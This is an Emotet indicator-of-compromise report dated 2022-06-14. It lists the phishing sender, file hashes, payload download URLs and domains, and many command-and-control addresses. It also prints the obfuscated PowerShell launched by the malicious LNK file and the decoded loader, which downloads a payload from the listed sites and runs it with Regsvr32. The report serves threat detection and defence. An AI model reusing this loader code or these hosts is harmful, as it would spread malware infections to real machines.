2022-06-14 Emotet (E4) #2 IOCs
THREAT IDENTIFICATION: EMOTET (E4)
SUBJECTS OBSERVED
The subject line was taken from a previously stolen email thread.
SENDERS OBSERVED
sales@shiode.co.jp
ZIP FILE HASHES
Report - 2022-06-14_1146 Gmail.zip
ddf7fffd6c124f8fabd70153ce6362e6
LNK FILE HASHES
Report - 2022-06-14_1146.lnk
0a808ba146e8bd723dd87441ae473354
POWERSHELL CAPTURED DURING LNK FILE EXECUTION
powershell.exe [600]
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'XWP/JUioHBbmF1/daOqX3ZLIuxOfBKijbBATwbDCqROkGOhOZIpGTr/EErkWy+dbdxAhTEPz';$PdTOA='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';$GomygB='ICAgICAgV3JpdGUtSG9zdCAicXRUalUiOyRQcm9ncm';$GomygB=$GomygB+$PdTOA;$hcWLw=$GomygB;$Ag=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($hcWLw));$hcWLw=$Ag;iex($hcWLw)}"
BASE64 BLOB DECODES TO:
Write-Host "qtTjU";$ProgressPreference="SilentlyContinue";$links=("http://mulmatdol.com/adm/lg46WOQGCq37Qedak/","http://www.balcaodasmarcas.com/wp-content/X5plOf5lcRhDMfzy3/","http://www.fundacioncedes.org/_installation/vjglk6ECI/","http://www.awam.be/moi/seYtEQPAW/","https://wijsneusmedia.nl/cgi-bin/xNMrVukyjq2kmdO/","https://zenprod.com/im_edit/2w/");$t="oOWIUaWai";$d="$env:TMP\..\$t";mkdir -force $d | out-null;foreach ($u in $links) {try {IWR $u -OutFile $d\BZQgbnEZYF.ONj;Regsvr32.exe "$d\BZQgbnEZYF.ONj";break} catch { }}
EMOTET PAYLOAD DOWNLOAD URLS
http://mulmatdol.com/adm/lg46WOQGCq37Qedak/
http://www.balcaodasmarcas.com/wp-content/X5plOf5lcRhDMfzy3/
http://www.fundacioncedes.org/_installation/vjglk6ECI/
http://www.awam.be/moi/seYtEQPAW/
https://wijsneusmedia.nl/cgi-bin/xNMrVukyjq2kmdO/
https://zenprod.com/im_edit/2w/
EMOTET PAYLOAD DOWNLOAD DOMAINS
awam.be
balcaodasmarcas.com
fundacioncedes.org
mulmatdol.com
wijsneusmedia.nl
zenprod.com
EMOTET PAYLOAD FILE HASHES
1c6ba04dc9808084846ac1005deb9c85
b1abebca8a365e960f8c7470c7308be1
c69af841e6ba7cbfd68715c1d3dd23a4
d434e7c85603678eafeea9fa2b6c477f
e1997362dd966e3a5efd93d273f49b2c
e2af37ce8154d8326658d698bf317570
EMOTET C2s
http://144.91.78.55:443
http://172.105.226.75:8080
http://51.161.73.194:443
http://45.186.16.18:443
http://41.73.252.195:443
http://172.104.251.154:8080
http://45.176.232.124:443
http://103.75.201.2:443
http://197.242.150.244:8080
http://173.212.193.249:8080
http://212.24.98.99:8080
http://51.254.140.238:7080
http://1.234.2.232:8080
http://183.111.227.137:8080
http://103.132.242.26:8080
http://82.165.152.127:8080
http://107.170.39.149:8080
http://46.55.222.11:443
http://153.126.146.25:7080
http://134.122.66.193:8080
http://151.106.112.196:8080
http://163.44.196.120:8080
http://164.68.99.3:8080
http://213.241.20.155:443
http://45.118.115.99:8080
http://101.50.0.91:8080
http://167.172.253.162:8080
http://207.148.79.14:8080
http://129.232.188.93:443
http://185.4.135.165:8080
http://1.234.21.73:7080
http://150.95.66.124:8080
http://149.56.131.28:8080
http://115.68.227.76:8080
http://201.94.166.162:443
http://196.218.30.83:443
http://103.70.28.102:8080
http://91.207.28.33:8080
http://209.97.163.214:443
http://206.189.28.199:8080
http://64.227.100.222:8080
http://188.44.20.25:443
http://159.65.140.115:443
http://51.91.76.89:8080
http://186.194.240.217:443
http://45.235.8.30:8080
http://103.43.75.120:443
http://79.137.35.198:8080
http://82.223.21.224:8080
http://160.16.142.56:8080
http://158.69.222.101:443
http://5.9.116.246:8080
http://94.23.45.86:4143
http://203.114.109.124:443
http://159.65.88.10:8080
http://146.59.226.45:443
http://209.126.98.206:8080
http://119.193.124.41:7080
http://110.232.117.186:8080
http://37.187.115.122:8080
http://72.15.201.15:8080
http://131.100.24.231:80
http://159.89.202.34:443